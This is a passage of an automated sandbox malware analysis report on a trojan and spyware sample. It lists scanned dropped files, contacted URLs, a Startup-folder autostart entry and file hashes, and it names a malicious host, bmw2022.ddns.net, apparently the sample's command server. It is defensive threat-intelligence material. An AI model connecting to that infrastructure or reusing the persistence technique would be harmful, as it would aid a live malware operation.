        | C:\b53dd3b256ba71dad061693a386e\1025\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1028\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1029\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1030\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1031\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1032\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1033\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1035\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1036\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1037\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1038\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1040\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1041\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1042\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1043\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1044\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1045\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1046\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1049\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1053\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\1055\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\2052\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\2070\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\3076\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\3082\SetupResources.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\Setup.exe | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\SetupEngine.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\SetupUi.dll | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\SetupUtility.exe | 0% | ReversingLabs | | |
        | C:\b53dd3b256ba71dad061693a386e\sqmapi.dll | 0% | ReversingLabs | | |
        No Antivirus matches
        No Antivirus matches
        | Source | Detection | Scanner | Label | Link |
        |---|---|---|---|---|
        | https://cdn.entity. | 0% | URL Reputation | safe | |
        | https://powerlift.acompli.net | 0% | URL Reputation | safe | |
        | https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe | |
        | https://cortana.ai | 0% | URL Reputation | safe | |
        | https://api.aadrm.com/ | 0% | URL Reputation | safe | |
        | http://www.sajatypeworks.com | 0% | URL Reputation | safe | |
        | https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe | |
        | http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe | |
        | http://www.urwpp.deDPlease | 0% | URL Reputation | safe | |
        | https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe | |
        | https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe | |
        | https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe | |
        | https://api.scheduler. | 0% | URL Reputation | safe | |
        | https://my.microsoftpersonalcontent.com | 0% | URL Reputation | safe | |
        | https://store.office.cn/addinstemplate | 0% | URL Reputation | safe | |
        | https://api.aadrm.com | 0% | URL Reputation | safe | |
        | https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe | |
        | https://www.odwebp.svc.ms | 0% | URL Reputation | safe | |
        | https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe | |
        | https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe | |
        | https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe | |
        | http://www.carterandcone.coml | 0% | URL Reputation | safe | |
        | https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe | |
        | https://ncus.contentsync. | 0% | URL Reputation | safe | |
        | https://apis.live.net/v5.0/ | 0% | URL Reputation | safe | |
        | https://wus2.contentsync. | 0% | URL Reputation | safe | |
        | https://make.powerautomate.com | 0% | URL Reputation | safe | |
        | http://www.tiro.com | 0% | URL Reputation | safe | |
        | https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe | |
        | https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe | |
        | http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe | |
        | https://d.docs.live.net | 0% | Avira URL Cloud | safe | |
        | http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe | |
        | http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe | |
        | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
        |---|---|---|---|---|---|
        | bmw2022.ddns.net | 156.196.162.149 | true | true | | unknown |
        | Name | Source | Malicious | Antivirus Detection | Reputation |
        |---|---|---|---|---|
        | https://api.diagnosticssdf.office.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://login.microsoftonline.com/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://shell.suite.office.com:1443 | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://autodiscover-s.outlook.com/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://useraudit.o365auditrealtimeingestion.manage.office.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://outlook.office365.com/connectors | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://cdn.entity. | E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://api.addins.omex.office.net/appinfo/query | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://clients.config.office.net/user/v1.0/tenantassociationkey | E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://powerlift.acompli.net | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://rpsticket.partnerservices.getmicrosoftkey.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://lookup.onenote.com/lookup/geolocation/v1 | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://cortana.ai | E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | http://www.fontbureau.com/designers | ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | false | | high |
        | https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://api.powerbi.com/v1.0/myorg/imports | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://cloudfiles.onenote.com/upload.aspx | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://entitlement.diagnosticssdf.office.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://api.aadrm.com/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | http://www.sajatypeworks.com | ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
        | https://ofcrecsvcapi-int.azurewebsites.net/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | http://www.founder.com.cn/cn/cThe | ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
        | https://www.yammer.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://api.microsoftstream.com/api/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://cr.office.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | http://www.galapagosdesign.com/DPlease | ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
        | https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | Avira URL Cloud: safe | low |
        | http://www.urwpp.deDPlease | ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
        | http://www.zhongyicts.com.cn | ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
        | https://portal.office.com/account/?ref=ClientMeControl | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ESjy0irMIn.exe, 00000000.00000002.1752276948.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
        | https://graph.ppe.windows.net | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://res.getmicrosoftkey.com/api/redemptionevents | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://powerlift-frontdesk.acompli.net | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://tasks.office.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://officeci.azurewebsites.net/api/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://sr.outlook.office.net/ws/speech/recognize/assistant/work | E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://api.scheduler. | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://my.microsoftpersonalcontent.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://store.office.cn/addinstemplate | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://api.aadrm.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://outlook.office.com/autosuggest/api/v1/init?cvid= | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://globaldisco.crm.dynamics.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://messaging.engagement.office.com/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://dev0-api.acompli.net/autodetect | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://www.odwebp.svc.ms | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://api.diagnosticssdf.office.com/v2/feedback | E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://api.powerbi.com/v1.0/myorg/groups | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://web.microsoftstream.com/video/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://api.addins.store.officeppe.com/addinstemplate | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://graph.windows.net | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://dataservice.o365filtering.com/ | E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://officesetup.getmicrosoftkey.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://analysis.windows.net/powerbi/api | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | http://www.carterandcone.coml | ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
        | https://prod-global-autodetect.acompli.net/autodetect | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://substrate.office.com | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | http://www.fontbureau.com/designers/frere-user.html | ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | false | | high |
        | https://outlook.office365.com/autodiscover/autodiscover.json | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://consent.config.office.com/consentcheckin/v1.0/consents | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://d.docs.live.net | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | Avira URL Cloud: safe | unknown |
        | https://ncus.contentsync. | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | http://weather.service.msn.com/data.aspx | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://apis.live.net/v5.0/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | URL Reputation: safe | unknown |
        | https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://messaging.lifecycle.office.com/ | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
        | https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | false | | high |
                                                                                                                    https://pushchannel.1drv.msDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office365.comE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                          high
                                                                                                                          http://www.fontbureau.com/designersGESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://wus2.contentsync.DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://incidents.diagnostics.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                              high
                                                                                                                              http://www.fontbureau.com/designers/?ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.founder.com.cn/cn/bTheESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://clients.config.office.net/user/v1.0/iosE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                  high
                                                                                                                                  https://make.powerautomate.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://api.addins.omex.office.net/api/addins/searchDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                    high
                                                                                                                                    http://www.fontbureau.com/designers?ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/odc/insertmediaDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                        high
                                                                                                                                        https://outlook.office365.com/api/v1.0/me/ActivitiesDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                          high
                                                                                                                                          https://api.office.netE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                            high
                                                                                                                                            https://incidents.diagnosticssdf.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                              high
                                                                                                                                              http://www.tiro.comESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
156.196.162.149 | bmw2022.ddns.net | Egypt | 8452 | TE-ASTE-ASEG | true
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1336857
Start date and time: 2023-11-03 18:51:23 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: ESjy0irMIn.exe (renamed because original name is a hash value)
Original Sample Name: 536018D01EE05BC37064C480178E2BF8.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@20/146@4/1
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 400
• Number of non-executed functions: 59
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for currently running targets with high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.196.184.112, 52.109.8.89, 52.109.16.112, 52.113.194.132
• Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, slscr.update.microsoft.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, us1.roaming1.live.com.akadns.net, ocsp.digicert.com, login.live.com, s-0005.s-msedge.net, e16604.g.akamaiedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, prod.fs.microsoft.com.akadns.net
• Execution Graph export aborted for target ESjy0irMIn.exe, PID 6720 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: ESjy0irMIn.exe
Time | Type | Description
17:52:25 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js
18:52:23 | API Interceptor | 843813x Sleep call for process: essam@sasa2023.exe modified
18:52:47 | API Interceptor | 7732492x Sleep call for process: splwow64.exe modified
Process: C:\b53dd3b256ba71dad061693a386e\Setup.exe
File Type: HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 16118
Entropy (8bit): 3.6434775915277604
Encrypted: false
SSDEEP: 192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
MD5: CD131D41791A543CC6F6ED1EA5BD257C
SHA1: F42A2708A0B42A13530D26515274D1FCDBFE8490
SHA-256: E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
SHA-512: A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
Malicious: false
Reputation: moderate, very likely benign file
